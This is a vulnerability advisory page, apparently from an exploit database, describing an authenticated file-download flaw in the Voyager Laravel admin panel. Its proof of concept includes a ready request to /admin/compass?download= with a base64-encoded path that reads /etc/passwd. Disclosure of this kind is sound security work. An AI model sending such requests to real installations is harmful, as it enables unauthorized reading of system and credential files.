Voyager Laravel Authentication Local File Download

2024.11.30
id Khunerable (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Voyager Laravel Authentication Local File Download # Description: - # Date: 21112024 # Exploit Author: Khunerable # Vendor Homepage: https://voyager.devdojo.com/ | https://github.com/thedevdojo/voyager # Tested on: Windows 11,Windows NT 10.0 ///////////////////////////////////////////////////////////////////////////////////////// POC : you need to log-in into admin dashboard to execute after login, access "/admin/compass" then access /admin/compass?download=base64encodedirandfile example : L2V0Yy9wYXNzd2Q= : /etc/passwd localhost/admin/compass?download=L2V0Yy9wYXNzd2Q=


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top